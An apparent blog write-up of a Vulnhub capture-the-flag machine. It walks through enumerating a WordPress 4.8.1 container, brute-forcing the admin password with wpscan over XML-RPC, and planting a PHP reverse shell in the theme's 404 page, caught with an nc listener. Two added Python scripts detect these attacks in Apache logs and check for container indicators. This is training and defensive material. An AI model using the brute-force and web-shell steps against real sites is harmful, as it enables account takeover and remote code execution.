Vulnhub Vulnerable Container Docker machine (partial: root not obtained)

Vulnerable Container Docker

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.91.0/16   |   Screen View: Unique Hosts        
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor           
 192.168.56.100  08:00:27:57:2d:6b      1      60  PCS Systemtechnik GmbH   
 192.168.56.104  08:00:27:ac:76:db      1      60  PCS Systemtechnik GmbH  


Using netdiscover, the target host's IP address is identified as 192.168.56.104.

NMAP scan

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
sudo: unable to resolve host kali: Name or service not known
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 22:46 EDT
Nmap scan report for localhost (192.168.56.104)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
|   2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
|   256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_  256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
8000/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.8.1
|_http-title: NotSoEasy Docker – Just another WordPress site
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
MAC Address: 08:00:27:AC:76:DB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds

The NMAP scan shows the target host has only two open ports: 22 and 8000.

Information gathering

Information gathering can only proceed via port 8000.

┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ curl http://192.168.56.104:8000
<!DOCTYPE html>
<html lang="en-US" class="no-js no-svg">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">

(omitted)

It is a blog site (WordPress version 4.8.1).

┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ curl http://192.168.56.104:8000/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

Scan for directories:

┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ gobuster dir -u http://192.168.56.104:8000 -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z            
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.104:8000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/25 22:53:46 Starting gobuster in directory enumeration mode
===============================================================
/about                (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/about/]
/contact              (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]
/blog                 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]   
/home                 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/home/]   
/rss                  (Status: 200) [Size: 2402]                                       
/login                (Status: 302) [Size: 0] [--> http://192.168.56.104:8000/wp-login.php]
/0                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/0/]          
/feed                 (Status: 200) [Size: 17992]                                          
/atom                 (Status: 200) [Size: 20055]                                          
/s                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]
/b                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]       
/a                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/a-homepage-section/]
/c                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]           
/wp-content           (Status: 301) [Size: 328] [--> http://192.168.56.104:8000/wp-content/]      
/p                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]            
/admin                (Status: 302) [Size: 0] [--> http://192.168.56.104:8000/wp-admin/]          
/Home                 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/Home/]              
/post                 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]            
/h                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]
/rss2                 (Status: 200) [Size: 17992]                                                     
/Contact              (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/Contact/]               
/About                (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/About/]                 
/wp-includes          (Status: 301) [Size: 329] [--> http://192.168.56.104:8000/wp-includes/]         
/C                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]               
/A                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/a-homepage-section/]    
/P                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]                
/S                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]           
/Blog                 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/Blog/]                  
/B                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]                  
/H                    (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]
/page2                (Status: 200) [Size: 61436]                                                     
/bl                   (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]                  
/sa                   (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]           
/rdf                  (Status: 200) [Size: 16332]                                                     
/page1                (Status: 200) [Size: 71444]                                                     
/sample               (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]           
/co                   (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]               
/page3                (Status: 200) [Size: 61563]                                                     
/page4                (Status: 200) [Size: 61611]                                                     
/page5                (Status: 200) [Size: 61603]                                                     
/page6                (Status: 200) [Size: 61591]                                                     
/dashboard            (Status: 302) [Size: 0] [--> http://192.168.56.104:8000/wp-admin/]              
/he                   (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]
/page7                (Status: 200) [Size: 61591]                                                     
/ab                   (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/about/]                 
/page10               (Status: 200) [Size: 61555]                                                     
/%20                  (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/]                       
/page8                (Status: 200) [Size: 61591]                                                     
/sam                  (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]           
/page9                (Status: 200) [Size: 61594]                                                     
/page11               (Status: 200) [Size: 61402]                                                     
/cont                 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]               
/po                   (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]                
/page12               (Status: 200) [Size: 55009]                                                     
/ho                   (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/home/]                  
/coffee               (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/coffee/]                
/hello                (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]

┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ wpscan --url http://192.168.56.104:8000 -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.

Scan Aborted: Canceled by User
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ wpscan --url http://192.168.56.104:8000 -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.104:8000/ [192.168.56.104]
[+] Started: Tue Oct 25 23:00:45 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.10 (Debian)
 |  - X-Powered-By: PHP/5.6.31
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.104:8000/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.104:8000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.104:8000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.104:8000/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.104:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
 |  - http://192.168.56.104:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] bob
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.104:8000/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Oct 25 23:00:55 2022
[+] Requests Done: 62
[+] Cached Requests: 18
[+] Data Sent: 16.185 KB
[+] Data Received: 1.179 MB
[+] Memory used: 238.555 MB
[+] Elapsed time: 00:00:09

The username bob is identified; it should be the administrator, since the first post was created by this user.

Next, crack bob's password.

wpscan can also be used for the brute force. Although I saw other walkthroughs use other tools, I still used wpscan; it took quite long, roughly 20-plus minutes, but bob's password was obtained successfully:

┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ wpscan --url http://192.168.56.104:8000 -U bob -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.104:8000/ [192.168.56.104]
[+] Started: Tue Oct 25 23:04:36 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.10 (Debian)
 |  - X-Powered-By: PHP/5.6.31
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.104:8000/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.104:8000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.104:8000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.104:8000/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.104:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
 |  - http://192.168.56.104:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:03 <=======================> (137 / 137) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - bob / Welcome1                                                                            
Trying bob / Welcome1 Time: 00:20:41 <                      > (40400 / 14384792)  0.28%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: bob, Password: Welcome1

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Oct 25 23:25:34 2022
[+] Requests Done: 40542
[+] Cached Requests: 38
[+] Data Sent: 20.883 MB
[+] Data Received: 24.873 MB
[+] Memory used: 251.355 MB
[+] Elapsed time: 00:20:58
                                                    

Log in to the WordPress backend and upload the PHP shell through it: Appearance -> Editor, edit the 404 page and replace its contents with the PHP shell.

Then visit

http://192.168.56.104:8000/wp-content/themes/default/404.php

and a shell is obtained:

└─$ sudo nc -nlvp 5555
sudo: unable to resolve host kali: Name or service not known
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.104] 56190
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux
 03:28:03 up 44 min,  0 users,  load average: 0.38, 2.89, 3.56
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
$ bash -i
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8f4bca8ef241:/$ 
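From the defender's side, both steps above leave a clear trace in the Apache access log on port 8000: the wpscan password attack is tens of thousands of POSTs to /xmlrpc.php from one source, and the shell drop is a POST to the theme editor followed by a direct request for a theme template such as 404.php. The following detection script is an added example, not part of the original write-up; the log lines are constructed, and the /wp-admin/theme-editor.php path is the standard WordPress endpoint assumed to back Appearance -> Editor.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format, as written by the Apache 2.4 instance on port 8000.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def xmlrpc_bruteforce(lines, threshold=20, window_s=60):
    """Return {ip: peak_count} for sources that POST to /xmlrpc.php more than
    `threshold` times inside any sliding window of `window_s` seconds."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/xmlrpc.php"):
            posts[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > threshold:
                hits[ip] = max(hits.get(ip, 0), end - start + 1)
    return hits

def theme_file_shell(lines):
    """Flag an IP that POSTs to the theme editor and later requests a theme
    template file directly (the edit-404.php-then-browse-to-it sequence)."""
    editors, hits = set(), []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        if rec["method"] == "POST" and rec["path"].startswith("/wp-admin/theme-editor.php"):
            editors.add(rec["ip"])
        elif rec["ip"] in editors and re.match(r"^/wp-content/themes/[^/]+/\w+\.php", rec["path"]):
            hits.append((rec["ip"], rec["path"]))
    return hits

# Constructed sample log: 25 XML-RPC POSTs in 25 seconds, then the theme edit.
SAMPLE_LOG = [
    f'192.168.56.101 - - [25/Oct/2022:23:05:{s:02d} -0400] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WPScan v3.8.22"'
    for s in range(25)
] + [
    '192.168.56.1 - - [25/Oct/2022:23:10:00 -0400] "GET /feed/ HTTP/1.1" 200 17992 "-" "curl/7.85.0"',
    '192.168.56.101 - - [25/Oct/2022:23:28:01 -0400] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.56.101 - - [25/Oct/2022:23:28:20 -0400] "GET /wp-content/themes/twentyseventeen/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]
```

A real run of 40542 requests over 21 minutes, as in the wpscan summary above, trips the default threshold within the first minute; disabling xmlrpc.php and the theme editor (DISALLOW_FILE_EDIT) removes both attack paths outright.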

www-data@8f4bca8ef241:/$ ss -tunlp
ss -tunlp
Netid  State      Recv-Q Send-Q     Local Address:Port       Peer Address:Port 
udp    UNCONN     0      0             127.0.0.11:37172                 *:*     
tcp    LISTEN     0      128           127.0.0.11:42117                 *:*     
tcp    LISTEN     0      128                    *:80                    *:*   

At this point we should still be inside a container.

www-data@8f4bca8ef241:/$ ss -ntp
ss -ntp
State      Recv-Q Send-Q        Local Address:Port          Peer Address:Port 
CLOSE-WAIT 1      0                172.18.0.2:80          192.168.56.101:47602 
ESTAB      0      79               172.18.0.2:56190       192.168.56.101:5555   users:(("ss",pid=117,fd=15))
ESTAB      0      0                172.18.0.2:57532           172.18.0.3:3306   users:(("ss",pid=117,fd=14))
www-data@8f4bca8ef241:/$ 
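The evidence for that conclusion is visible in the output above: the hostname 8f4bca8ef241 is a 12-hex-digit container ID, 127.0.0.11 is Docker's embedded DNS resolver, and 172.18.0.2 sits on a Docker user-defined network. The following helper, an added example rather than code from the write-up, turns those indicators into a repeatable check; the resolv.conf text is constructed to match the resolver the ss output shows.

```python
import os
import re
import socket

DOCKER_DNS = "127.0.0.11"  # embedded DNS resolver Docker injects on user-defined networks

def container_indicators(hostname, resolv_conf, cgroup, dockerenv_exists):
    """Return the reasons a host looks like a Docker container. Evidence is
    passed in explicitly so the check can run offline on captured output."""
    reasons = []
    if re.fullmatch(r"[0-9a-f]{12}", hostname):
        reasons.append(f"hostname {hostname} is a 12-hex-digit container ID")
    if any(l.split() == ["nameserver", DOCKER_DNS] for l in resolv_conf.splitlines()):
        reasons.append(f"/etc/resolv.conf points at {DOCKER_DNS} (Docker embedded DNS)")
    if "/docker/" in cgroup or "docker-" in cgroup:
        reasons.append("/proc/1/cgroup references a docker cgroup")
    if dockerenv_exists:
        reasons.append("/.dockerenv is present")
    return reasons

def read_file(path):
    """Read a file, returning '' if it is unreadable."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""

def check_local_host():
    """Run the same check against the machine this script executes on."""
    return container_indicators(
        socket.gethostname(),
        read_file("/etc/resolv.conf"),
        read_file("/proc/1/cgroup"),
        os.path.exists("/.dockerenv"),
    )

# Constructed evidence mirroring the write-up: the container hostname and a
# resolver on 127.0.0.11, the address ss shows listening inside the container.
WRITEUP_HOSTNAME = "8f4bca8ef241"
WRITEUP_RESOLV = "nameserver 127.0.0.11\noptions ndots:0\n"

if __name__ == "__main__":
    for r in container_indicators(WRITEUP_HOSTNAME, WRITEUP_RESOLV, "", False):
        print("[container]", r)
```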

posted @ 2022-10-26 11:40  Jason_huawen